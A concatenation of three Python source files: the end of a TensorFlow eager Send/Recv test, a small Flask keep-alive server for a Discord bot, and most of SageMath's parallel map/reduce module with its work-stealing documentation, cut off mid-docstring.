cpu_device = '/job:localhost/replica:0/task:0/device:CPU:0'
def _send(self, tensor, tensor_name, to_device):
return execute(
b'_Send', num_outputs=0, inputs=[tensor],
attrs=('T', tensor.dtype.as_datatype_enum,
'tensor_name', tensor_name,
'send_device', tensor.device,
'send_device_incarnation', 0,
'recv_device', to_device,
'client_terminated', True))
def _recv(self, dtype, tensor_name, from_device):
device_name = context.context().device_name
if not device_name:
device_name = self.cpu_device
return execute(
b'_Recv', num_outputs=1, inputs=[],
attrs=('tensor_type', dtype.as_datatype_enum,
'tensor_name', tensor_name,
'send_device', from_device,
'send_device_incarnation', 0,
'recv_device', device_name,
'client_terminated', False))[0]
def setUp(self):
super(SendRecvTest, self).setUp()
context._reset_context()
configure_virtual_cpus()
@test_util.disable_tfrt('Send/Receive not supported in TFRT yet.')
def testBasic(self):
with ops.device(self.cpu_device):
t0 = constant_op.constant(1.0)
t1 = constant_op.constant(2.0)
self._send(t0, 't0', self.cpu_device)
self._send(t1, 't1', self.cpu_device)
self.assertAllEqual(
self._recv(dtypes.float32, 't0', self.cpu_device),
1.0)
self.assertAllEqual(
self._recv(dtypes.float32, 't1', self.cpu_device),
2.0)
@test_util.run_gpu_only
@test_util.disable_tfrt('Send/Receive not supported in TFRT yet.')
def testLocalCrossDevice(self):
gpu_device_name = '/job:localhost/replica:0/task:0/device:GPU:0'
with ops.device('GPU:0'):
t0 = array_ops.identity(1.0)
self._send(t0, 't0', self.cpu_device)
with ops.device('cpu:0'):
self.assertAllEqual(
self._recv(dtypes.float32, 't0', gpu_device_name),
1.0)
self._send(constant_op.constant(2.0), 't1', gpu_device_name)
with ops.device('GPU:0'):
self.assertAllEqual(
self._recv(dtypes.float32, 't1', self.cpu_device),
2.0)
class EagerTensorCacheTest(test_util.TensorFlowTestCase):
def setUp(self):
super(EagerTensorCacheTest, self).setUp()
context._reset_context()
configure_virtual_cpus()
def testCacheSkipsTensorsTooLarge(self):
cache = context._EagerTensorCache(max_items=100, max_tensor_size=3)
cache.put('1', array_ops.zeros((2, 2)))
self.assertIsNone(cache.get('1'))
cache.put('2', array_ops.zeros((2)))
self.assertIsNotNone(cache.get('2'))
if __name__ == '__main__':
test.main()
|
keep_alive.py
|
#***************************************************************************#
# #
# MCDramaBot - A Discord Bot That Causes Drama #
# https://github.com/CrankySupertoon/MCDramaBot #
# Copyright (C) 22020 CrankySupertoon. All rights reserved. #
# #
# License: #
# MIT License https://www.mit.edu/~amini/LICENSE.md #
# #
#***************************************************************************#
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "I am not dead."
def run():
app.run(host='0.0.0.0',port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
|
map_reduce.py
|
# -*- coding: utf-8 -*-
r"""
Parallel computations using RecursivelyEnumeratedSet and Map-Reduce
There is an efficient way to distribute computations on a set
`S` of objects defined by :func:`RecursivelyEnumeratedSet`
(see :mod:`sage.sets.recursively_enumerated_set` for more details)
over which one would like to perform the following kind of operations:
* Compute the cardinality of a (very large) set defined recursively
(through a call to :class:`RecursivelyEnumeratedSet_forest`)
* More generally, compute any kind of generating series over this set
* Test a conjecture, e.g. find an element of `S` satisfying a specific
property, or check that none does or that they all do
* Count/list the elements of `S` that have a specific property
* Apply any map/reduce kind of operation over the elements of `S`
AUTHORS:
- Florent Hivert -- code, documentation (2012--2016)
- Jean Baptiste Priez -- prototype, debugging help on MacOSX (2011-June, 2016)
- Nathann Cohen -- some documentation (2012)
Contents
--------
- :ref:`basic-usage`
- :ref:`advanced-use`
- :ref:`profiling`
- :ref:`logging`
- :ref:`protocol-description`
- :ref:`examples`
How is this different from usual MapReduce?
-------------------------------------------
This implementation is specific to :class:`RecursivelyEnumeratedSet_forest`, and uses its
properties to do its job. Not only mapping and reducing but also
**generating the elements** of `S` is done on different processors.
.. _basic-usage:
How can I use all that stuff?
-----------------------------
First, you need to set the environment variable ``SAGE_NUM_THREADS`` to the
desired number of parallel threads to be used::
sage: import os # not tested
sage: os.environ["SAGE_NUM_THREADS"] = '8' # not tested
Second, you need the information necessary to describe a
:class:`RecursivelyEnumeratedSet_forest` representing your set `S` (see
:mod:`sage.sets.recursively_enumerated_set`). Then, you need to provide a
"map" function as well as a "reduce" function. Here are some examples:
* **Counting the number of elements.** In this situation, the map function
can be set to ``lambda x: 1``, and the reduce function just adds the
values together, i.e. ``lambda x, y: x + y``.
We count binary words of length `\leq 16`::
sage: seeds = [[]]
sage: succ = lambda l: [l + [0], l + [1]] if len(l) < 16 else []
sage: S = RecursivelyEnumeratedSet(seeds, succ,
....: structure='forest', enumeration='depth')
sage: map_function = lambda x: 1
sage: reduce_function = lambda x, y: x + y
sage: reduce_init = 0
sage: S.map_reduce(map_function, reduce_function, reduce_init)
131071
This matches the number of binary words of length `\leq 16`::
sage: factor(131071 + 1)
2^17
Note that the map and reduce functions here have the default values of the
:meth:`sage.sets.recursively_enumerated_set.RecursivelyEnumeratedSet_forest.map_reduce` method
so that the number of elements can be obtained more simply with::
sage: S.map_reduce()
131071
Instead of using :func:`RecursivelyEnumeratedSet`, one can directly use
:class:`RESetMapReduce`, which gives finer
control over the parallel execution (see :ref:`advanced-use` below)::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce(
....: roots=[[]],
....: children=lambda l: [l + [0], l + [1]] if len(l) < 16 else [],
....: map_function=lambda x: 1,
....: reduce_function=lambda x, y: x + y,
....: reduce_init=0)
sage: S.run()
131071
* **Generating series.** For this, take a Map function that associates a
monomial to each element of `S`, while the Reduce function is still equal to
``lambda x, y: x + y``.
We compute the generating series for counting binary words of each
length `\leq 16`::
sage: S = RecursivelyEnumeratedSet(
....: [[]], lambda l: [l + [0], l + [1]] if len(l) < 16 else [],
....: structure='forest', enumeration='depth')
sage: x = polygen(ZZ)
sage: sp = S.map_reduce(
....: map_function=lambda z: x**len(z),
....: reduce_function=lambda x, y: x + y,
....: reduce_init=0)
sage: sp
65536*x^16 + 32768*x^15 + 16384*x^14 + 8192*x^13 + 4096*x^12
+ 2048*x^11 + 1024*x^10 + 512*x^9 + 256*x^8 + 128*x^7 + 64*x^6
+ 32*x^5 + 16*x^4 + 8*x^3 + 4*x^2 + 2*x + 1
This is of course `\sum_{i=0}^{16} (2x)^i`::
sage: sp == sum((2*x)^i for i in range(17))
True
Here is another example where we count permutations of size `\leq 8` (here
we use the default values)::
sage: S = RecursivelyEnumeratedSet(
....: [[]],
....: lambda l: ([l[:i] + [len(l)] + l[i:]
....: for i in range(len(l) + 1)] if len(l) < 8 else []),
....: structure='forest',
....: enumeration='depth')
sage: x = polygen(ZZ)
sage: sp = S.map_reduce(lambda z: x**len(z)); sp
40320*x^8 + 5040*x^7 + 720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
This is of course `\sum_{i=0}^{8} i! x^i`::
sage: sp == sum(factorial(i)*x^i for i in range(9))
True
* **Post Processing.** We now demonstrate the use of ``post_process``. We
generate the permutation as previously, but we only perform the map/reduce
computation on those of even ``len``. Of course we get the even part of the
previous generating series::
sage: S = RecursivelyEnumeratedSet(
....: [[]],
....: lambda l: ([l[:i] + [len(l) + 1] + l[i:]
....: for i in range(len(l) + 1)] if len(l) < 8 else []),
....: post_process=lambda l: l if len(l) % 2 == 0 else None,
....: structure='forest',
....: enumeration='depth')
sage: sp = S.map_reduce(lambda z: x**len(z)); sp
40320*x^8 + 720*x^6 + 24*x^4 + 2*x^2 + 1
This is also useful for example to call a constructor on the generated
elements::
sage: S = RecursivelyEnumeratedSet(
....: [[]],
....: lambda l: ([l[:i] + [len(l) + 1] + l[i:]
....: for i in range(len(l) + 1)] if len(l) < 5 else []),
....: post_process=lambda l: Permutation(l) if len(l) == 5 else None,
....: structure='forest',
....: enumeration='depth')
sage: x = polygen(ZZ)
sage: sp = S.map_reduce(lambda z: x**z.number_of_inversions()); sp
x^10 + 4*x^9 + 9*x^8 + 15*x^7 + 20*x^6 + 22*x^5 + 20*x^4 + 15*x^3 + 9*x^2 + 4*x + 1
We get here a polynomial which is the `q`-factorial (in the variable `x`) of `5`,
that is, `\prod_{i=1}^{5} \frac{1-x^i}{1-x}`::
sage: x = polygen(ZZ)
sage: prod((1-x^i)//(1-x) for i in range(1, 6))
x^10 + 4*x^9 + 9*x^8 + 15*x^7 + 20*x^6 + 22*x^5 + 20*x^4 + 15*x^3 + 9*x^2 + 4*x + 1
Compare::
sage: from sage.combinat.q_analogues import q_factorial
sage: q_factorial(5)
q^10 + 4*q^9 + 9*q^8 + 15*q^7 + 20*q^6 + 22*q^5 + 20*q^4 + 15*q^3 + 9*q^2 + 4*q + 1
* **Listing the objects.** One can also compute the list of objects in a
:class:`RecursivelyEnumeratedSet_forest>`
using :class:`RESetMapReduce`. As an example, we compute the set of numbers
between 1 and 63, generated by their binary expansion::
sage: S = RecursivelyEnumeratedSet(
....: [1],
....: lambda l: [(l<<1)|0, (l<<1)|1] if l < 1<<5 else [],
....: structure='forest',
....: enumeration='depth')
Here is the list computed without :class:`RESetMapReduce`::
sage: serial = list(S)
sage: serial
[1, 2, 4, 8, 16, 32, 33, 17, 34, 35, 9, 18, 36, 37, 19, 38, 39, 5, 10,
20, 40, 41, 21, 42, 43, 11, 22, 44, 45, 23, 46, 47, 3, 6, 12, 24, 48,
49, 25, 50, 51, 13, 26, 52, 53, 27, 54, 55, 7, 14, 28, 56, 57, 29, 58,
59, 15, 30, 60, 61, 31, 62, 63]
Here is how to perform the parallel computation. The order of the lists
depends on the synchronisation of the various computation processes and
therefore should be considered as random::
sage: parall = S.map_reduce(lambda x: [x], lambda x, y: x + y, [])
sage: parall # random
[1, 3, 7, 15, 31, 63, 62, 30, 61, 60, 14, 29, 59, 58, 28, 57, 56, 6, 13,
27, 55, 54, 26, 53, 52, 12, 25, 51, 50, 24, 49, 48, 2, 5, 11, 23, 47,
46, 22, 45, 44, 10, 21, 43, 42, 20, 41, 40, 4, 9, 19, 39, 38, 18, 37,
36, 8, 17, 35, 34, 16, 33, 32]
sage: sorted(serial) == sorted(parall)
True
.. _advanced-use:
Advanced use
------------
Fine control over the execution of a map/reduce computation is achieved
via parameters passed to the :meth:`RESetMapReduce.run` method.
The following three parameters can be used:
- ``max_proc`` -- (integer, default: ``None``) if given, the
maximum number of worker processors to use. The actual number
is also bounded by the value of the environment variable
``SAGE_NUM_THREADS`` (the number of cores by default).
- ``timeout`` -- a timeout on the computation (default: ``None``)
- ``reduce_locally`` -- whether the workers should reduce locally
their work or sends results to the master as soon as possible.
See :class:`RESetMapReduceWorker` for details.
Here is an example or how to deal with timeout::
sage: from sage.parallel.map_reduce import (RESetMPExample, AbortError)
sage: EX = RESetMPExample(maxl=100)
sage: try:
....: res = EX.run(timeout=float(0.01))
....: except AbortError:
....: print("Computation timeout")
....: else:
....: print("Computation normally finished")
....: res
Computation timeout
The following should not timeout even on a very slow machine::
sage: EX = RESetMPExample(maxl=8)
sage: try:
....: res = EX.run(timeout=60)
....: except AbortError:
....: print("Computation Timeout")
....: else:
....: print("Computation normally finished")
....: res
Computation normally finished
40320*x^8 + 5040*x^7 + 720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
As for ``reduce_locally``, one should not see any difference, except for speed
during normal usage. Most of the time one should leave it set to ``True``,
unless one sets up a mechanism to consume the partial results as soon as they
arrive. See :class:`RESetParallelIterator` and in particular the ``__iter__``
method for a example of consumer use.
.. _profiling:
Profiling
---------
It is possible to profile a map/reduce computation. First we create a
:class:`RESetMapReduce` object::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce(
....: roots=[[]],
....: children=lambda l: [l + [0], l + [1]] if len(l) < 16 else [],
....: map_function=lambda x: 1,
....: reduce_function=lambda x, y: x + y,
....: reduce_init=0)
The profiling is activated by the ``profile`` parameter. The value provided
should be a prefix (including a possible directory) for the profile dump::
sage: prof = tmp_dir('RESetMR_profile') + 'profcomp'
sage: res = S.run(profile=prof) # random
[RESetMapReduceWorker-1:58] (20:00:41.444) Profiling in
/home/user/.sage/temp/.../32414/RESetMR_profilewRCRAx/profcomp1
...
[RESetMapReduceWorker-1:57] (20:00:41.444) Profiling in
/home/user/.sage/temp/.../32414/RESetMR_profilewRCRAx/profcomp0
...
sage: res
131071
In this example, the profiles have been dumped in files such as
``profcomp0``. One can then load and print them as follows. See
:class:`cProfile.Profile` for more details::
sage: import cProfile, pstats
sage: st = pstats.Stats(prof+'0')
sage: st.strip_dirs().sort_stats('cumulative').print_stats() # random
...
Ordered by: cumulative time
ncalls tottime percall cumtime percall filename:lineno(function)
1 0.023 0.023 0.432 0.432 map_reduce.py:1211(run_myself)
11968 0.151 0.000 0.223 0.000 map_reduce.py:1292(walk_branch_locally)
...
<pstats.Stats instance at 0x7fedea40c6c8>
.. SEEALSO::
`The Python Profilers <https://docs.python.org/2/library/profile.html>`_
for more detail on profiling in python.
.. _logging:
Logging
-------
The computation progress is logged through a :class:`logging.Logger` in
``sage.parallel.map_reduce.logger`` together with :class:`logging.StreamHandler`
and a :class:`logging.Formatter`. They are currently configured to print
warning messages to the console.
.. SEEALSO::
`Logging facility for Python <https://docs.python.org/2/library/logging.html>`_
for more detail on logging and log system configuration.
.. note::
Calls to logger which involve printing the node are commented out in the
code, because the printing (to a string) of the node can be very time
consuming depending on the node and it happens before the decision whether
the logger should record the string or drop it.
.. _protocol-description:
How does it work ?
------------------
The scheduling algorithm we use here is any adaptation of :wikipedia:`Work_stealing`:
In a work stealing scheduler, each processor in a computer system has a
queue of work items (computational tasks, threads) to perform. [...]. Each
work items are initially put on the queue of the processor executing the
work item. When a processor runs out of work, it looks at the queues of
other processors and "steals" their work items. In effect, work stealing
distributes the scheduling work over idle processors, and as long as all
processors have work to do, no scheduling overhead occurs.
For communication we use Python's basic :mod:`multiprocessing` module. We
first describe the different actors and communication tools used by the
system. The work is done under the coordination of a **master** object (an
instance of :class:`RESetMapReduce`) by a bunch of **worker** objects
(instances of :class:`RESetMapReduceWorker`).
Each running map reduce instance works on a :class:`RecursivelyEnumeratedSet_forest>` called here `C` and is
coordinated by a :class:`RESetMapReduce` object called the **master**. The
master is in charge of launching the work, gathering the results and cleaning
up at the end of the computation. It doesn't perform any computation
associated to the generation of the element `C` nor the computation of the
mapped function. It however occasionally perform a reduce, but most reducing
is by default done by the workers. Also thanks to the work-stealing algorithm,
the master is only involved in detecting the termination of the computation
but all the load balancing is done at the level of the workers.
Workers are instances of :class:`RESetMapReduceWorker`. They are responsible
for doing the actual computations: element generation, mapping and reducing.
They are also responsible for the load balancing thanks to work-stealing.
Here is a description of the attributes of the **master** relevant to the
map-reduce protocol:
- ``_results`` -- a :class:`~multiprocessing.queues.SimpleQueue` where
the master gathers the results sent by the workers.
- ``_active_tasks`` -- a :class:`~multiprocessing.Semaphore` recording
the number of active tasks. The work is complete when it reaches 0.
- ``_done`` -- a :class:`~multiprocessing.Lock` which ensures that
shutdown is done only once.
- ``_aborted`` -- a :func:`~multiprocessing.Value` storing a shared
:class:`ctypes.c_bool` which is ``True`` if the computation was aborted
before all workers ran out of work.
- ``_workers`` -- a list of :class:`RESetMapReduceWorker` objects.
Each worker is identified by its position in this list.
Each **worker** is a process (:class:`RESetMapReduceWorker` inherits from
:class:`~multiprocessing.Process`) which contains:
- ``worker._iproc`` -- the identifier of the worker that is its position in the
master's list of workers
- ``worker._todo`` -- a :class:`collections.deque` storing of nodes of the
worker. It is used as a stack by the worker. Thiefs steal from the bottom of
this queue.
- ``worker._request`` -- a :class:`~multiprocessing.queues.SimpleQueue` storing
steal request submitted to ``worker``.
- ``worker._read_task``, ``worker._write_task`` -- a
:class:`~multiprocessing.queues.Pipe` used to transfert node during steal.
- ``worker._thief`` -- a :class:`~threading.Thread` which is in charge of
stealing from ``worker._todo``.
Here is a schematic of the architecture:
.. _figure-map_reduce_arch:
.. figure:: ../../media/map_reduce_arch.png
How thefts are performed
------------------------
During normal time, that is, when all workers are active, a worker ``W`` is
iterating though a loop inside
:meth:`RESetMapReduceWorker.walk_branch_locally`. Work nodes are taken from
and new nodes ``W._todo`` are appended to ``W._todo``. When a worker ``W``
runs out of work, that is, when ``worker._todo`` is empty, it tries to steal
some work (i.e., a node) from another worker. This is performed in the
:meth:`RESetMapReduceWorker.steal` method.
From the point of view of ``W``, here is what happens:
- ``W`` signals to the master that it is idle: ``master._signal_task_done``;
- ``W`` chooses a victim ``V`` at random;
- ``W`` sends a request to ``V``: it puts its identifier into ``V._request``;
- ``W`` tries to read a node from ``W._read_task``. Then three things may happen:
+ a proper node is read. Then the theft was a success and ``W`` starts
working locally on the received node.
+ ``None`` is received. This means that ``V`` was idle. Then ``W`` tries
another victim.
+ :exc:`AbortError` is received. This means either that the computation was
aborted or that it simply succeeded and that no more work is required by
``W``. Therefore an :exc:`AbortError` exception is raised leading ``W`` to
shutdown.
We now describe the protocol on the victim's side. Each worker process contains
a :class:`Thread` which we call ``T`` for thief which acts like some kind of
Troyan horse during theft. It is normally blocked waiting for a steal request.
From the point of view of ``V`` and ``T``, here is what happens:
- during normal time, ``T`` is blocked waiting on ``V._request``;
- upon steal request, ``T`` wakes up receiving the identification of ``W``;
- ``T`` signals to the master that a new task is starting by
``master._signal_task_start``;
- Two things may happen depending if the queue ``V._todo`` is empty or not.
Remark that due to the GIL, there is no parallel execution between the
victim ``V`` and its thief thread ``T``.
+ If ``V._todo`` is empty, then ``None`` is answered on
``W._write_task``. The task is immediately signaled to end the master
through ``master._signal_task_done``.
+ Otherwise, a node is removed from the bottom of ``V._todo``. The node is
sent to ``W`` on ``W._write_task``. The task will be ended by ``W``, that
is, when finished working on the subtree rooted at the node, ``W`` will
call ``master._signal_task_done``.
The end of the computation
--------------------------
To detect when a computation is finished, a synchronized integer is kept which
counts the number of active tasks. This is essentially a semaphore but
semaphores are broken on Darwin OSes so we ship two implementations depending
on the OS (see :class:`ActiveTaskCounter` and :class:`ActiveTaskCounterDarwin`
and the note below).
When a worker finishes working on a task, it calls
``master._signal_task_done``. This decreases the task counter
``master._active_tasks``. When it reaches 0, it means that there are no more
nodes: the work is completed. The worker executes ``master._shutdown``
which sends :exc:`AbortError` to all ``worker._request`` and
``worker._write_task`` queues. Each worker or thief thread receiving such
a message raises the corresponding exception, therefore stopping its work. A
lock called ``master._done`` ensures that shutdown is only done once.
Finally, it is also possible to interrupt the computation before its ends,
by calling ``master.abort()``. This is achieved by setting
``master._active_tasks`` to 0 and calling ``master._shutdown``.
.. warning:: The macOS Semaphore bug
Darwin OSes do not correctly implement POSIX's semaphore semantic.
Indeed, on these systems, acquire may fail and return False not only when
the semaphore is equal to zero but also **because someone else is trying
to acquire** at the same time. This makes using Semaphores impossible
on macOS so that on these systems we use a synchronized integer instead.
.. _examples:
Are there examples of classes?
------------------------------
Yes! Here they are:
- :class:`RESetMPExample` -- a simple basic example
- :class:`RESetParallelIterator` -- a more advanced example using non standard
communication configuration.
Tests
-----
Generating series for the sum of strictly decreasing lists of integers
smaller than 15::
sage: y = polygen(ZZ, 'y')
sage: R = RESetMapReduce(
....: roots=[([], 0, 0)] + [([i], i, i) for i in range(1, 15)],
....: children=lambda list_sum_last:
....: [(list_sum_last[0] + [i], list_sum_last[1] + i, i)
....: for i in range(1, list_sum_last[2])],
....: map_function=lambda li_sum_dummy: y**li_sum_dummy[1])
sage: sg = R.run()
sage: sg == prod((1 + y**i) for i in range(1, 15))
True
Classes and methods
-------------------
"""
# ****************************************************************************
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
# https://www.gnu.org/licenses/
# ****************************************************************************
import copy
import sys
import random
import queue
import ctypes
import logging
import multiprocessing as mp
from collections import deque
from threading import Thread
from sage.sets.recursively_enumerated_set import RecursivelyEnumeratedSet # _generic
from sage.misc.lazy_attribute import lazy_attribute
logger = logging.getLogger(__name__)
logger.__doc__ = ("""
A logger for :mod:`sage.parallel.map_reduce`
.. SEEALSO::
`Logging facility for Python <https://docs.python.org/2/library/logging.html>`_
for more detail on logging and log system configuration.
""")
logger.setLevel(logging.WARN)
# logger.setLevel(logging.INFO)
# logger.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter(
'[%(processName)s-%(threadName)s] (%(asctime)s.%(msecs)03.f) %(message)s',
datefmt='%H:%M:%S')
ch.setFormatter(formatter)
logger.addHandler(ch)
# Set up a multiprocessing context to use for this modules (using the
# 'fork' method which is basically same as on Python 2)
mp = mp.get_context('fork')
def proc_number(max_proc=None):
r"""
Return the number of processes to use.
INPUT:
- ``max_proc`` -- an upper bound on the number of processes or
``None``.
EXAMPLES::
sage: from sage.parallel.map_reduce import proc_number
sage: proc_number() # random
8
sage: proc_number(max_proc=1)
1
sage: proc_number(max_proc=2) in (1, 2)
True
"""
from sage.parallel.ncpus import ncpus
n = ncpus()
if max_proc is None:
return n
else:
return min(max_proc, n)
class AbortError(Exception):
r"""
Exception for aborting parallel computations.
This is used both as exception or as abort message.
TESTS::
sage: from sage.parallel.map_reduce import AbortError
sage: raise AbortError
Traceback (most recent call last):
...
AbortError
"""
pass
class ActiveTaskCounterDarwin():
r"""
Handling the number of active tasks.
A class for handling the number of active tasks in a distributed
computation process. This is essentially a semaphore, but Darwin OSes
do not correctly implement POSIX's semaphore semantic. So we use
a shared integer with a lock.
"""
def __init__(self, task_number):
r"""
TESTS::
sage: from sage.parallel.map_reduce import ActiveTaskCounterDarwin as ATC
sage: t = ATC(4)
sage: TestSuite(t).run(skip="_test_pickling", verbose=True)
running ._test_new() . . . pass
"""
self._active_tasks = mp.Value(ctypes.c_int, task_number)
self._lock = mp.Lock()
def __repr__(self):
"""
TESTS::
sage: from sage.parallel.map_reduce import ActiveTaskCounterDarwin as ATC
sage: ATC(4)
ActiveTaskCounter(value=4)
"""
return "ActiveTaskCounter(value=%s)" % (self._active_tasks.value)
def task_start(self):
r"""
Increment the task counter by one.
OUTPUT:
Calling :meth:`task_start` on a zero or negative counter returns 0,
otherwise increment the counter and returns its value after the
incrementation.
EXAMPLES::
sage: from sage.parallel.map_reduce import ActiveTaskCounterDarwin as ATC
sage: c = ATC(4); c
ActiveTaskCounter(value=4)
sage: c.task_start()
5
sage: c
ActiveTaskCounter(value=5)
Calling :meth:`task_start` on a zero counter does nothing::
sage: c = ATC(0)
sage: c.task_start()
0
sage: c
ActiveTaskCounter(value=0)
"""
logger.debug("_signal_task_start called")
with self._lock:
# The following test is not necessary but is allows active thieves to
# stop before receiving the poison pill.
if self._active_tasks.value <= 0:
return 0
self._active_tasks.value += 1
return self._active_tasks.value
def task_done(self):
r"""
Decrement the task counter by one.
OUTPUT:
Calling :meth:`task_done` decrements the counter and returns
its new value.
EXAMPLES::
sage: from sage.parallel.map_reduce import ActiveTaskCounterDarwin as ATC
sage: c = ATC(4); c
ActiveTaskCounter(value=4)
sage: c.task_done()
3
sage: c
ActiveTaskCounter(value=3)
sage: c = ATC(0)
sage: c.task_done()
-1
"""
logger.debug("_signal_task_done called")
with self._lock:
self._active_tasks.value -= 1
return self._active_tasks.value
def abort(self):
r"""
Set the task counter to zero.
EXAMPLES::
sage: from sage.parallel.map_reduce import ActiveTaskCounterDarwin as ATC
sage: c = ATC(4); c
ActiveTaskCounter(value=4)
sage: c.abort()
sage: c
ActiveTaskCounter(value=0)
"""
with self._lock:
self._active_tasks.value = 0
class ActiveTaskCounterPosix():
r"""
Handling the number of active tasks.
A class for handling the number of active tasks in a distributed
computation process. This is the standard implementation on POSIX
compliant OSes. We essentially wrap a semaphore.
.. note::
A legitimate question is whether there is a need in keeping the two
implementations. I ran the following experiment on my machine::
S = RecursivelyEnumeratedSet(
[[]],
lambda l: ([l[:i] + [len(l)] + l[i:]
for i in range(len(l) + 1)]
if len(l) < NNN else []),
structure='forest',
enumeration='depth')
%time sp = S.map_reduce(lambda z: x**len(z)); sp
For NNN = 10, averaging a dozen of runs, I got:
- Posix compliant implementation: 17.04 s
- Darwin implementation: 18.26 s
So there is a non negligible overhead. It will probably be worth it
if we try to cythonize the code. So I'm keeping both implementations.
"""
def __init__(self, task_number):
r"""
TESTS::
sage: from sage.parallel.map_reduce import ActiveTaskCounter as ATC
sage: t = ATC(4)
sage: TestSuite(t).run(skip="_test_pickling", verbose=True)
running ._test_new() . . . pass
"""
self._active_tasks = mp.Semaphore(task_number)
def __repr__(self):
"""
TESTS::
sage: from sage.parallel.map_reduce import ActiveTaskCounter as ATC
sage: ATC(4)
ActiveTaskCounter(value=4)
"""
return "ActiveTaskCounter(value=%s)" % (self._active_tasks.get_value())
def task_start(self):
r"""
Increment the task counter by one.
OUTPUT:
Calling :meth:`task_start` on a zero or negative counter returns 0,
otherwise it increments the counter and returns its new value.
EXAMPLES::
sage: from sage.parallel.map_reduce import ActiveTaskCounter as ATC
sage: c = ATC(4); c
ActiveTaskCounter(value=4)
sage: c.task_start()
5
sage: c
ActiveTaskCounter(value=5)
Calling :meth:`task_start` on a zero counter does nothing::
sage: c = ATC(0)
sage: c.task_start()
0
sage: c
ActiveTaskCounter(value=0)
"""
logger.debug("_signal_task_start called")
# The following test is not necessary but is allows active thieves to
# stop before receiving the poison pill.
if self._active_tasks._semlock._is_zero():
return 0
self._active_tasks.release()
return self._active_tasks.get_value()
task_start.__doc__ = ActiveTaskCounterDarwin.task_start.__doc__
def task_done(self):
r"""
Decrement the task counter by one.
OUTPUT:
Calling :meth:`task_done` decrements the counter and returns
its new value.
EXAMPLES::
sage: from sage.parallel.map_reduce import ActiveTaskCounter as ATC
sage: c = ATC(4); c
ActiveTaskCounter(value=4)
sage: c.task_done()
3
sage: c
ActiveTaskCounter(value=3)
sage: c = ATC(0)
sage: c.task_done()
-1
"""
logger.debug("_signal_task_done called")
# We test if the semaphore counting the number of active tasks is
# becoming negative. This should not happen in normal
# computations. However, in case of abort, we artificially put the
# semaphore to 0 to stop the computation so it is needed.
if not self._active_tasks.acquire(False):
return -1
return self._active_tasks.get_value()
def abort(self):
r"""
Set the task counter to zero.
EXAMPLES::
sage: from sage.parallel.map_reduce import ActiveTaskCounter as ATC
sage: c = ATC(4); c
ActiveTaskCounter(value=4)
sage: c.abort()
sage: c
ActiveTaskCounter(value=0)
"""
while self._active_tasks.acquire(False):
pass
ActiveTaskCounter = (ActiveTaskCounterDarwin if sys.platform == 'darwin'
else ActiveTaskCounterPosix)
# ActiveTaskCounter = ActiveTaskCounterDarwin # to debug Darwin implementation
class RESetMapReduce():
r"""
Map-Reduce on recursively enumerated sets.
INPUT:
Description of the set:
- either ``forest=f`` -- where ``f`` is a :class:`RecursivelyEnumeratedSet_forest>`
- or a triple ``roots, children, post_process`` as follows
- ``roots=r`` -- The root of the enumeration
- ``children=c`` -- a function iterating through children nodes,
given a parent node
- ``post_process=p`` -- a post-processing function
The option ``post_process`` allows for customizing the nodes that
are actually produced. Furthermore, if ``post_process(x)`` returns ``None``,
then ``x`` won't be output at all.
Description of the map/reduce operation:
- ``map_function=f`` -- (default to ``None``)
- ``reduce_function=red`` -- (default to ``None``)
- ``reduce_init=init`` -- (default to ``None``)
.. SEEALSO::
:mod:`the Map/Reduce module <sage.parallel.map_reduce>` for
details and examples.
"""
def __init__(self,
roots=None,
children=None,
post_process=None,
map_function=None,
reduce_function=None,
reduce_init=None,
forest=None):
r"""
TESTS::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: R = RESetMapReduce([[]], lambda: [[]])
sage: R
<sage.parallel.map_reduce.RESetMapReduce object at 0x...>
To silence the coverage checker::
sage: TestSuite(R).run(skip=['_test_pickling'])
"""
if forest is not None:
if not all(x is None for x in (roots, children, post_process)):
raise ValueError("forest arg is incompatible with roots, children and post_process")
self._forest = forest
self._roots = forest._roots
self.children = forest.children
if hasattr(forest, 'post_process'):
self.post_process = forest.post_process
else:
if roots is not None:
self._roots = roots
if children is not None:
self.children = children
if post_process is not None:
self.post_process = post_process
if map_function is not None:
self.map_function = map_function
if reduce_function is not None:
self.reduce_function = reduce_function
if reduce_init is not None:
self._reduce_init = reduce_init
self._profile = None
@lazy_attribute
def _forest(self):
r"""
Return the forest underlying the map-reduce computation.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: EX = RESetMPExample()
sage: f = EX._forest; f
An enumerated set with a forest structure
sage: f.an_element()
[]
"""
return RecursivelyEnumeratedSet(
self.roots(),
self.children,
post_process=self.post_process,
structure='forest',
enumeration='depth')
def roots(self):
r"""
Return the roots of ``self``.
OUTPUT:
An iterable of nodes.
.. note:: This should be overloaded in applications.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce(42)
sage: S.roots()
42
"""
return self._roots
def map_function(self, o):
r"""
Return the function mapped by ``self``.
INPUT:
- ``o`` -- a node
OUTPUT:
By default ``1``.
.. note:: This should be overloaded in applications.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce()
sage: S.map_function(7)
1
sage: S = RESetMapReduce(map_function = lambda x: 3*x + 5)
sage: S.map_function(7)
26
"""
return 1
def reduce_function(self, a, b):
r"""
Return the reducer function for ``self``.
INPUT:
- ``a``, ``b`` -- two values to be reduced
OUTPUT:
By default the sum of ``a`` and ``b``.
.. note:: This should be overloaded in applications.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce()
sage: S.reduce_function(4, 3)
7
sage: S = RESetMapReduce(reduce_function=lambda x,y: x*y)
sage: S.reduce_function(4, 3)
12
"""
return a + b
def post_process(self, a):
r"""
Return the image of ``a`` under the post-processing function for ``self``.
INPUT:
- ``a`` -- a node
With the default post-processing function, which is the identity function,
